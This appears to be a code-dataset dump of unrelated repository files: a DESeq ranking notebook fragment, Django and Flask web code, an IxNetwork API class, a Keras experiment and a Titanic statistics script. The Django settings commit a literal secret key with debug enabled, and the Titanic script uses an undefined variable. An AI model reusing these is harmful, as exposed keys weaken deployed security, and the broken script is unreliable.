# * Percent DE (simulated): the fraction of the simulated experiments in which that gene was found to be DE using (log fold change > 1 and adjusted p-value < 0.05). _Note:_ you may find that many genes have a 0 fraction. This is because there is some compression that happens when pushing data through the VAE so the variance of the simulated experiments is lower compared to the real experiment. We are aware of this limitation in the VAE and are looking at how to improve the variance and biological signal captured by the VAE, however we were still able to demonstrate that for now the VAE is able to simulate realistic looking biological experiments in our previous [paper](https://academic.oup.com/gigascience/article/9/11/giaa117/5952607).
#
#
# **Note:**
# * If using DESeq, genes with NaN in only the `Adj P-value (Real)` column are those genes flagged because of the `cooksCutoff` parameter. The cook's distance as a diagnostic to tell if a single sample has a count which has a disproportionate impact on the log fold change and p-values. These genes are flagged with an NA in the pvalue and padj columns of the result table.
#
# * If using DESeq with count threshold, some genes may not be present in all simulated experiments (i.e. the `Number of experiments (simulated)` will not equal the number of simulated experiments you specified in the beginning. This pre-filtering will lead to some genes found in few simulated experiments and so the background/null set for that gene is not robust. Thus, the user should sort by both z-score and number of experiments to identify specific expressed genes.
#
# * If using DESeq without count threshold, some genes may still not be present in all simulated experiments (i.e. the `Number of experiments (simulated)` will not equal the number of simulated experiments you specified in the beginning. If the gene is 0 expressed across all samples and thus automatically given an NA in `log fold change, adjusted p-value` columns. Thus, the user should sort by both z-score and number of experiments to identify specific expressed genes.
#
# For more information you can read [DESeq FAQs](https://bioconductor.org/packages/release/bioc/vignettes/DESeq2/inst/doc/DESeq2.html#pvaluesNA)
# +
# Get summary table
summary_gene_ranks = ranking.generate_summary_table(
template_DE_stats_filename,
template_DE_stats,
simulated_DE_summary_stats,
col_to_rank_genes,
local_dir,
"gene",
params,
)
summary_gene_ranks.sort_values(by="Z score", ascending=False).head(10)
# -
summary_gene_ranks.isna().any()
summary_gene_ranks[summary_gene_ranks.isna().any(axis=1)]
# Save
summary_gene_ranks.to_csv(output_filename, sep="\t")
| [
"alexjlee.21@gmail.com"
] | alexjlee.21@gmail.com |
bb2552195c1f2eeed8c3a81f66292e4bc14d7e1f | 32cb945b9836b6f10985aad8f92b879ee20ccb41 | /blog/models.py | b74733deba6618a1017d2c2fcdc17cc12ac192f1 | [] | no_license | Adrianzctpa/DjangoLearningBlog | 9db48efcf985a731ee16056961bd84784a7fef44 | 763a3f5397262777cfc5f21cd7de2cdbd8819242 | refs/heads/master | 2023-05-15T05:54:55.713061 | 2021-06-12T18:50:12 | 2021-06-12T18:55:25 | 376,334,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 649 | py | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse
class Post(models.Model):
title = models.CharField(max_length=100)
content = models.TextField()
date_posted = models.DateTimeField(default=timezone.now)
last_edited = models.DateTimeField(auto_now=True)
author = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('post-detail', kwargs={"pk": self.pk})
class About(models.Model):
image = models.ImageField(default='default.jpg') | [
"nocommentaryadrian@gmail.com"
] | nocommentaryadrian@gmail.com |
0928364e99cece0452c1080d6db49b5ce77a91f5 | 7803f266bbec4b1c83f383d92e1174a71e1684fd | /routes/api_topics.py | 7fd03335926a00dbf8c0492993356cd09036d52a | [] | no_license | tanqhnguyen/flask-demo | 38803fa272f86d45b75212579b215467a728cf0a | 75f0de717025262ffc2143a720e2c36868b65a9e | refs/heads/master | 2021-05-29T01:52:42.523982 | 2015-04-18T15:24:28 | 2015-04-18T15:24:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,949 | py | from flask import Blueprint, url_for, jsonify, request, g
from flask.ext.babel import gettext as _
from decorators import login_required, check_permission, get_topic
from utils import json_error, json_data, json_error_invalid_request, json_error_database, process_order_input
from models import Comment, Topic, db_session, ModelException
from forms import TopicForm, CommentForm
import logging
import cache.topic as cache
api_topics = Blueprint('api_topics', __name__)
# routes
@api_topics.route('/topics/list', methods=["GET"])
def list():
user = g.user
limit = int(request.args.get('limit', 10))
offset = int(request.args.get('offset', 0))
order = request.args.get('order', '-date_created')
topics = cache.get_topics(user=user, sort_by=order, limit=limit, offset=offset)
pagination = {
"total": Topic.count(),
"offset": int(offset),
"limit": int(limit)
}
return jsonify(dict(data=topics, pagination=pagination))
@api_topics.route('/topics/read', methods=["GET"])
def read():
pass
@api_topics.route('/topics/create', methods=["POST"])
@login_required(json=True)
def create():
data = request.get_json()
form = TopicForm(**data)
if form.validate():
form_data = form.data
form_data['ip'] = request.remote_addr
try:
topic = g.user.create_topic(**form_data)
alert = dict(
type='success',
messages=_("Your topic has been created successfully. You will be redirected to it shortly")
)
redirect = topic.get_url('view')
cache.update_sorted_topics(topic, 'date_created')
return jsonify({"data": topic.json_data(), "alert": alert, "redirect": redirect})
except ModelException, me:
db_session.rollback()
return json_error(type=me.type, messages=me.message)
except Exception, e:
logging.error(e)
db_session.rollback()
return json_error_database()
else:
return json_error(type="VALIDATION_FAILED", messages=form.errors)
@api_topics.route('/topics/vote', methods=["POST"])
@login_required(json=True)
@get_topic(json=True)
def vote():
topic = g.topic
data = request.get_json()
up = data.get('up', True)
try:
vote = topic.vote(user=g.user, ip=request.remote_addr, up=up)
if vote.id:
# this is an updated vote
if vote.changed:
points = topic.update_points(up=up, points=2)
topic.user.update_points(up=up, points=6)
else:
points = topic.points
else:
# this is a new vote
points = topic.update_points(up)
user_points = 1
if up:
user_points = 5
topic.user.update_points(up=up, points=user_points)
db_session.commit()
data = {
"points": points
}
cache.update_topic(topic.id, topic)
cache.update_sorted_topics(topic, 'points')
return jsonify({"data": data})
except Exception, e:
logging.error(e)
db_session.rollback()
return json_error_database()
@api_topics.route('/topics/unvote', methods=["POST"])
@login_required(json=True)
@get_topic(json=True)
def unvote():
topic = g.topic
vote = topic.unvote(g.user)
if vote:
try:
topic.update_points(up= not vote.up)
user_points = 1
if vote.up:
user_points = 5
topic.user.update_points(up= not vote.up, points=user_points)
db_session.commit()
data = {
"points": topic.points
}
cache.update_topic(topic.id, topic)
cache.update_sorted_topics(topic, 'points')
return jsonify({"data": data})
except Exception, e:
logging.error(e)
return json_error_database()
else:
return json_error_invalid_request()
@api_topics.route('/topics/search', methods=["GET"])
def search():
query = request.args.get('query')
limit = int(request.args.get('limit', 10))
offset = int(request.args.get('offset', 0))
result = Topic.search(query, offset=offset, limit=limit)
topics = result.get('data')
pagination = dict(
limit=limit,
offset=offset,
total=Topic.count_search(query)
)
return jsonify(dict(
data=[topic.json_data() for topic in topics],
pagination=pagination
))
"""
Comments
"""
@api_topics.route('/topics/comments/create', methods=["POST"])
@login_required(json=True)
@get_topic(json=True)
def comment_create():
data = request.get_json()
topic = g.topic
form = CommentForm(**data)
if form.validate():
form_data = form.data
form_data['user'] = g.user
form_data['ip'] = request.remote_addr
try:
comment = topic.create_comment(**form_data)
topic.update_comment_count()
topic.update_user_comment_count(user_id=comment.user_id)
db_session.commit()
cache.update_topic(topic.id, topic)
cache.update_sorted_topics(topic, 'comment_count')
return jsonify({"data": comment.json_data()})
except ModelException, me:
db_session.rollback()
return json_error(type=me.type, messages=me.message)
except Exception, e:
logging.error(e)
db_session.rollback()
return json_error_database()
else:
return json_error(type="VALIDATION_FAILED", messages=form.errors)
@api_topics.route('/topics/comments/list', methods=["GET"])
@get_topic(json=True)
def comment_list():
topic = g.topic
limit = request.args.get('limit', 10)
offset = request.args.get('offset', 0)
data = topic.get_comments(limit=limit, offset=offset, json=True)
pagination = {
'limit': int(limit),
'offset': int(offset),
'total': topic.comment_count
}
return jsonify({"data": data, 'pagination': pagination})
@api_topics.route('/topics/comments/delete', methods=["POST"])
@login_required(json=True)
@check_permission('delete_comment')
def comment_delete():
data = request.get_json()
id = data.get('id')
comment = Comment.find_by_pk(id)
if comment:
try:
comment.topic.update_comment_count(offset=-1)
comment.topic.update_user_comment_count(offset=-1, user_id=comment.user_id)
comment.delete()
db_session.commit()
cache.update_topic(comment.topic.id, comment.topic)
cache.update_sorted_topics(comment.topic, 'comment_count')
return json_data(data)
except Exception:
db_session.rollback()
return json_error_database()
else:
return json_error_invalid_request() | [
"laoshanlung@gmail.com"
] | laoshanlung@gmail.com |
a4c44f2e0343cc29ca7b39dda84c174ba0bae39a | 01733042e84a768b77f64ec24118d0242b2f13b8 | /ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/learnedfilter_dc8ce473700453874488c1ea95947fa8.py | 0e44fc370da4d80e98b03eef81573a428644af64 | [
"MIT"
] | permissive | slieberth/ixnetwork_restpy | e95673905854bc57e56177911cb3853c7e4c5e26 | 23eeb24b21568a23d3f31bbd72814ff55eb1af44 | refs/heads/master | 2023-01-04T06:57:17.513612 | 2020-10-16T22:30:55 | 2020-10-16T22:30:55 | 311,959,027 | 0 | 0 | NOASSERTION | 2020-11-11T12:15:34 | 2020-11-11T12:06:00 | null | UTF-8 | Python | false | false | 5,854 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class LearnedFilter(Base):
"""This object contains criteria for filtering the learned routes.
The LearnedFilter class encapsulates a required learnedFilter resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'learnedFilter'
_SDM_ATT_MAP = {
'Afi': 'afi',
'EnableAfiSafi': 'enableAfiSafi',
'EnablePrefix': 'enablePrefix',
'Safi': 'safi',
}
def __init__(self, parent):
super(LearnedFilter, self).__init__(parent)
@property
def Capabilities(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.capabilities_4db6ad32c315806e926b0bd131f64535.Capabilities): An instance of the Capabilities class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.capabilities_4db6ad32c315806e926b0bd131f64535 import Capabilities
return Capabilities(self)._select()
@property
def Prefix(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.prefix_14ff2c47c83ae14aa22718e67f21f827.Prefix): An instance of the Prefix class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.prefix_14ff2c47c83ae14aa22718e67f21f827 import Prefix
return Prefix(self)._select()
@property
def Afi(self):
"""
Returns
-------
- number: Address Family Identifier value. Identifies the network layer protocol to be used with these routes.
"""
return self._get_attribute(self._SDM_ATT_MAP['Afi'])
@Afi.setter
def Afi(self, value):
self._set_attribute(self._SDM_ATT_MAP['Afi'], value)
@property
def EnableAfiSafi(self):
"""
Returns
-------
- bool: If enabled, allows the user to set values to be used for BGP-MP - the user-specified AFI and SAFI values for the BGP MP_REACH_NLRI.
"""
return self._get_attribute(self._SDM_ATT_MAP['EnableAfiSafi'])
@EnableAfiSafi.setter
def EnableAfiSafi(self, value):
self._set_attribute(self._SDM_ATT_MAP['EnableAfiSafi'], value)
@property
def EnablePrefix(self):
"""
Returns
-------
- bool: If enabled, BGP Prefix Filters configured in this dialog will be used to filter for routes that match those filter entries. Only those routes will be stored in the routing table. If disabled, all learned BGP routes will be stored.
"""
return self._get_attribute(self._SDM_ATT_MAP['EnablePrefix'])
@EnablePrefix.setter
def EnablePrefix(self, value):
self._set_attribute(self._SDM_ATT_MAP['EnablePrefix'], value)
@property
def Safi(self):
"""
Returns
-------
- number: Subsequent Address Family Identifier value. Used with, and provides additional information about, the AFI in the NLRI, per RFC 2858.
"""
return self._get_attribute(self._SDM_ATT_MAP['Safi'])
@Safi.setter
def Safi(self, value):
self._set_attribute(self._SDM_ATT_MAP['Safi'], value)
def update(self, Afi=None, EnableAfiSafi=None, EnablePrefix=None, Safi=None):
"""Updates learnedFilter resource on the server.
Args
----
- Afi (number): Address Family Identifier value. Identifies the network layer protocol to be used with these routes.
- EnableAfiSafi (bool): If enabled, allows the user to set values to be used for BGP-MP - the user-specified AFI and SAFI values for the BGP MP_REACH_NLRI.
- EnablePrefix (bool): If enabled, BGP Prefix Filters configured in this dialog will be used to filter for routes that match those filter entries. Only those routes will be stored in the routing table. If disabled, all learned BGP routes will be stored.
- Safi (number): Subsequent Address Family Identifier value. Used with, and provides additional information about, the AFI in the NLRI, per RFC 2858.
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
| [
"andy.balogh@keysight.com"
] | andy.balogh@keysight.com |
c464ce6e46bd8a08b34d12d4b84518bde3c23e0d | c79702519c499cc553d5d38b13d81ecadbda797c | /python_practice/exp/tutorials/mysite/mysite/settings.py | 70b3faf76f652743233899129c7d422799ed7e23 | [] | no_license | LeeJoohyon/Python_project | e7de60834a0e6596ffe0069438784c3bd8b6edde | 37dbfc9a480640a4f2ff000a461a9fb64367ebc2 | refs/heads/master | 2020-05-20T20:59:26.097060 | 2017-03-15T02:22:18 | 2017-03-15T02:22:18 | 84,523,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,097 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 't^0lrky-##dimv-a-o3hgd4-s40bx2ibw7qw6+wdcjh)6$(lgl'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| [
"jhe0956@gmail.com"
] | jhe0956@gmail.com |
f2fc421977a8d2618d5c627046454404bb3fc8c8 | a769aaa89f5314f3702e1926d86b4e6ece79d701 | /accounts/models.py | 3c077bbe1cdc2546621f45dc5c3c1e09b9f3f737 | [] | no_license | CASPER-REPSAC/casper-backend | 3bfb5e75dea8c9134f1c8cf0e6ea09e8f8500d65 | 5d2d21c15d0312e65b96bf0c0a84f52e4c57ca00 | refs/heads/main | 2023-07-13T18:39:47.297854 | 2021-07-12T06:11:37 | 2021-07-12T06:11:37 | 378,759,864 | 1 | 0 | null | 2021-09-07T04:23:11 | 2021-06-20T23:41:01 | Python | UTF-8 | Python | false | false | 2,836 | py | from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import AbstractUser, BaseUserManager
class UserManager(BaseUserManager):
def create_user(self, email, password, **extra_fields):
if not email:
raise ValueError(_('The Email must be set'))
email = self.normalize_email(email)
user = self.model(email=email, **extra_fields)
user.set_password(password)
user.save()
return user
def create_superuser(self, email, password, **extra_fields):
extra_fields.setdefault('is_staff', True)
extra_fields.setdefault('is_superuser', True)
extra_fields.setdefault('is_active', True)
if extra_fields.get('is_staff') is not True:
raise ValueError(_('Superuser must have is_staff=True.'))
if extra_fields.get('is_superuser') is not True:
raise ValueError(_('Superuser must have is_superuser=True.'))
return self.create_user(email, password, **extra_fields)
class User(AbstractUser):
username = None
registration_date = models.DateTimeField(auto_now_add=True)
real_name = models.CharField(max_length=10)
nickname = models.CharField(max_length=10)
email = models.EmailField(unique=True, max_length=255)
birth_date = models.DateTimeField(null=True)
photo = models.CharField(max_length=30)
stacks = models.CharField(max_length=30)
homepage = models.CharField(max_length=30)
blog = models.CharField(max_length=30)
contact = models.CharField(max_length=30)
description = models.TextField()
feed_mail = models.EmailField(max_length=255)
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
objects = UserManager()
def __str__(self):
return self.email
class Appeal(models.Model):
author = models.ForeignKey('accounts.User', related_name='appeal', on_delete=models.CASCADE)
updated_date = models.DateTimeField(auto_now_add=True)
content = models.TextField()
class Activist(models.Model):
owner = models.ForeignKey('accounts.User', related_name='activist', on_delete=models.CASCADE)
visible = models.BooleanField(default=True)
point = models.IntegerField(default=0)
total_point = models.IntegerField(default=0)
class Observer(models.Model):
owner = models.ForeignKey('accounts.User', related_name='observer', on_delete=models.CASCADE)
visible = models.BooleanField(default=True)
point = models.IntegerField(default=0)
total_point = models.IntegerField(default=0)
class Rescuer(models.Model):
owner = models.ForeignKey('accounts.User', related_name='rescuer', on_delete=models.CASCADE)
visible = models.BooleanField(default=True)
point = models.IntegerField(default=0)
total_point = models.IntegerField(default=0)
| [
"noreply@github.com"
] | noreply@github.com |
407e57da096a27e7fe849dfebaf14391770fd017 | 4206744104467aa21a08fe66b8571dcad1c3479e | /versuch timegenerator.py | 2a0af7084d8ae43975cb74eed389bd25bfbceea0 | [] | no_license | Manuel-D92/Masterarbeit | 7f2bad173652cca4283b6b428b7eab8a94bae920 | bbaa590ab82d545ba008675449f00468fef13789 | refs/heads/main | 2023-05-10T15:21:27.457060 | 2021-06-07T18:31:20 | 2021-06-07T18:31:20 | 374,754,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,075 | py | from sklearn.model_selection import train_test_split
from sklearn import preprocessing
import numpy as np
from keras.preprocessing.sequence import TimeseriesGenerator
import tensorflow as tf
import matplotlib.pyplot as plt
from datetime import datetime
import torch
import pandas as pd
import os
#from tensorflow.keras.layers.experimental import preprocessing
#class WindowGenerator():
# def __init__(self, input_width, label_width, shift,
# train_df=train_df, val_df=val_df, test_df=test_df,
# label_columns=None):
# # Store the raw data.
# self.train_df = train_df
# self.val_df = val_df
# self.test_df = test_df
#
# # Work out the label column indices.
# self.label_columns = label_columns
# if label_columns is not None:
# self.label_columns_indices = {name: i for i, name in
# enumerate(label_columns)}
# self.column_indices = {name: i for i, name in
# enumerate(train_df.columns)}
#
# # Work out the window parameters.
# self.input_width = input_width
# self.label_width = label_width
# self.shift = shift
#
# self.total_window_size = input_width + shift
#
# self.input_slice = slice(0, input_width)
# self.input_indices = np.arange(self.total_window_size)[self.input_slice]
#
# self.label_start = self.total_window_size - self.label_width
# self.labels_slice = slice(self.label_start, None)
# self.label_indices = np.arange(self.total_window_size)[self.labels_slice]
#
# def __repr__(self):
# return '\n'.join([
# f'Total window size: {self.total_window_size}',
# f'Input indices: {self.input_indices}',
# f'Label indices: {self.label_indices}',
# f'Label column name(s): {self.label_columns}'])
#
# def split_window(self, features):
# inputs = features[:, self.input_slice, :]
# labels = features[:, self.labels_slice, :]
# if self.label_columns is not None:
# labels = tf.stack(
# [labels[:, :, self.column_indices[name]] for name in self.label_columns],
# axis=-1)
#
# # Slicing doesn't preserve static shape information, so set the shapes
# # manually. This way the `tf.data.Datasets` are easier to inspect.
# inputs.set_shape([None, self.input_width, None])
# labels.set_shape([None, self.label_width, None])
#
# return inputs, labels
path = r"C:\Users\dauserml\Documents\2020_09_25\Messung_1"
path_test_sequenz = r"C:\Users\dauserml\Documents\2020_09_25\Testsequenz_1"
time_xyz_antennen_Signal_Komplex_all_Files = np.loadtxt(path+"\\all_Files.csv",delimiter=';')
time = time_xyz_antennen_Signal_Komplex_all_Files[:,0]
data = np.array([[i] for i in range(50)])
targets = np.array([[i] for i in range(50)])
X_1 = time_xyz_antennen_Signal_Komplex_all_Files[:,4:]
Y_1 = time_xyz_antennen_Signal_Komplex_all_Files[:,1:4]
data_gen = TimeseriesGenerator(X_1,Y_1, length=16, sampling_rate=4,batch_size=32)
assert len(data_gen) == 2236
batch_0 = data_gen[0]
batch_1 =data_gen[1]
x, y = batch_0
print('fsdf') | [
"85513263+Manuel-D92@users.noreply.github.com"
] | 85513263+Manuel-D92@users.noreply.github.com |
9055f539063c9603f998ca03a91b0406cc348a06 | 731e8ba383666085170fa74cef0511a36e009f42 | /utilities/robot_hand.py | 3d266c9d09901cdf6b5f199937a40104da0b97c2 | [
"MIT"
] | permissive | riccardosven/bypasser | 91e05587481fcca33b2cb4df9d484c94e5597679 | ffe079104879246a125ed29dba4bfe87e883b3d3 | refs/heads/master | 2021-05-28T22:43:42.356253 | 2015-07-09T14:27:23 | 2015-07-09T14:27:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 856 | py | #! /usr/bin/env python
###############################################################################
##
## robot_hand.py -- part of the bypasser program
##
## Copyright (c) 2014 Riccardo Sven Risuleo
##
## This software may be modified and distributed under the terms
## of the MIT license. See the LICENSE file for details.
##
###############################################################################
import serial
class RobotHand:
def __init__(self,device,baudrate):
try:
self.port = serial.Serial(device,baudrate)
except:
print('Could not open serial port')
def send(self,command):
try:
self.port.write(command)
except:
print('Cannot write to Arduino')
def close(self):
try:
self.port.close()
except:
pass
| [
"rsrsl"
] | rsrsl |
b83c20614a7c84216cff5466d3b48076c7c69baa | 59fe6c8730fd1b70e8fb791ba294cb35b76f5908 | /pset6/credit/credit.py | 13e978e236efb66f0b016a532b26789c352557a3 | [] | no_license | mykolas-s/cs50_Harvard | 4ec155c336c8be240cb289d85deec882246fd45b | 13053db0184bca485a439f5ddf2c445674ee2fa4 | refs/heads/master | 2020-04-30T23:05:38.455299 | 2019-03-22T12:44:24 | 2019-03-22T12:44:24 | 177,135,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | from cs50 import get_int
while True:
cc_number = get_int("credit card number: ")
if (cc_number):
break
string_number = str(cc_number)
digit_number = len(string_number) # how many digits there are in number
digit1 = int(string_number[0])
digit2 = int(string_number[1])
# magic formula
sum = 0
m = 1
for i in range(digit_number):
if (m % 2 == 0):
z = int(string_number[-m])*2
sum += z % 10
if (z >= 10):
sum += int(str(z)[0])
elif (m % 2 != 0):
y = int(string_number[-m])
sum += y
m += 1
if (m > digit_number):
break
x = sum % 10
#check card's validity
if (((digit1 == 3 and digit2 == 4 or digit2 == 7) and x == 0 and digit_number == 15)):
print("AMEX")
elif ((digit1 == 5 and digit2 == 1 or digit2 == 2 or digit2 == 3 or digit2 == 4 or digit2 == 5) and x == 0 and digit_number == 16):
print("MASTERCARD")
elif (digit1 == 4 and x == 0 and digit_number == 13 or digit_number == 16):
print("VISA")
else:
print("INVALID") | [
"mykolas.sermuksnis@gmail.com"
] | mykolas.sermuksnis@gmail.com |
5b42eece199dfcaef7a177a031dc5463bfde4e0b | 31f4edfcdcd6fdf64fb29ea8153adcd3df4a21b7 | /django/dbase/migrations/0001_initial.py | b2e99c28310e6bed3c96cda910923c4b45f26222 | [] | no_license | djs-gitbub/Models3 | e01417003e8d832cbbe584a99cb78a9d8930d8dd | d48be17644ccc2cfdd5abd195e676dea8cfba81b | refs/heads/main | 2023-04-03T00:28:53.448919 | 2021-03-30T16:00:20 | 2021-03-30T16:00:20 | 353,058,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 658 | py | # Generated by Django 3.1.7 on 2021-03-30 15:27
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Vocab',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author', models.CharField(max_length=100)),
('title', models.CharField(max_length=100)),
('year', models.IntegerField()),
('genre', models.CharField(max_length=100)),
],
),
]
| [
"selfedavid@gmail.com"
] | selfedavid@gmail.com |
8f1ad74885c3e26272c09d24c7a5c2073c619087 | bb8ed8b5aeede5f503ff5dac3870cf3817619282 | /trunk/soft/common/tools/change_pkg_proto.py | a4d8b24460f16c0c6a6455fd20e6e89f113f0b26 | [] | no_license | mengtest/idle | 561da3b4542ceca8a1b983e9214a57d6ecb7d22d | 6e7866d0f493155fbfc9c2c35062af833217cbd0 | refs/heads/master | 2022-03-01T00:07:51.808702 | 2019-10-31T11:09:22 | 2019-10-31T11:09:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | import sys
if __name__ == '__main__':
if len(sys.argv) > 1:
fname = sys.argv[1]
with open(fname, 'r') as f:
content = f.read()
flag = True
start = 0
while flag:
flag = False
i1 = content.find("_pb2 as ", start)
start = i1 + 21
if i1 >= 0:
flag = True
i2 = content.rfind("import", 0, i1)
content = content[0:i2 + 7] + "common.proto." + content[i2 + 7:]
with open(fname, 'w') as f:
f.write(content)
| [
"rocketxyfb@163.com"
] | rocketxyfb@163.com |
904c9c33359008e76bd3c89361e92714a6f69710 | 1b6836d8693f1e2644adc0e62f88f4f7ed5fc9cf | /kaggle/python/train_stats.py | 86362e6639c655158a1484cddbd49d9273ba2d55 | [] | no_license | gaudibr/datasci_course_materials | 0ea76da0d0cfcad94110593aa2fa7eb7a647c3c1 | 49ad8ddb29b256375f58c6f40d639b6162e35eef | refs/heads/master | 2020-12-25T00:29:02.172757 | 2013-07-06T00:48:54 | 2013-07-06T00:48:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,870 | py | """ This simple code is desinged to teach a basic user to read in the files in python, simply find what proportion of males and females survived and make a predictive model based on this
Author : AstroDave
Date : 18th September, 2012
"""
import csv as csv
import numpy as np
import math
#calculate entropy for the different attributes:
def entropy(labels):
""" Computes entropy of label distribution. """
n_labels = len(labels)
print n_labels
if n_labels <= 1:
return 0
counts = np.bincount(labels)
print counts
probs = [float(i) / float(n_labels) for i in counts]
print probs
n_classes = np.count_nonzero(probs)
print n_classes
if n_classes <= 1:
return 0
ent = 0.
# Compute standard entropy.
for i in probs:
ent -= i * math.log(i, n_classes)
return ent
csv_file_object = csv.reader(open('../csv/train.csv', 'rb')) #Load in the csv file
header = csv_file_object.next() #Skip the fist line as it is a header
data=[] #Creat a variable called 'data'
for row in csv_file_object: #Skip through each row in the csv file
data.append(row) #adding each row to the data variable
data = np.array(data) #Then convert from a list to an array
#Now I have an array of 11 columns and 891 rows
#I can access any element I want so the entire first column would
#be data[0::,0].astype(np.flaot) This means all of the columen and column 0
#I have to add the astype command
#as when reading in it thought it was a string so needed to convert
number_passengers = np.size(data[0::,0].astype(np.float))
number_survived = np.sum(data[0::,0].astype(np.float))
proportion_survivors = number_survived / number_passengers
print 'Proportion of people who survived is %s' %proportion_survivors
passenger_data = data[0::,0].astype(np.int)
#print passenger_data
print 'Entropy for survivors is %s' %entropy(passenger_data)
data[data[0::,3]=='male',3] = 1
data[data[0::,3]=='female',3] = 0
# I can now find the stats of all the women on board
women_only_stats = data[ data[0::,3] == 0 ] #This finds where all the women are
#men_only_stats = data[0::,3] == 1 #This finds where all the men are
# != means not equal
print women_only_stats
#I can now find for example the ages of all the women by just placing
#women_only_stats in the '0::' part of the array index. You can test it by
#placing it in the 4 column and it should all read 'female'
women_onboard = data[women_only_stats,0].astype(np.int)
men_onboard = data[men_only_stats,0].astype(np.float)
proportion_women_survived = np.sum(women_onboard) / np.size(women_onboard)
proportion_men_survived = np.sum(men_onboard) / np.size(men_onboard)
print 'Proportion of women who survived is %s' % proportion_women_survived
print 'Proportion of men who survived is %s' % proportion_men_survived
| [
"andre.ambrosio@me.com"
] | andre.ambrosio@me.com |
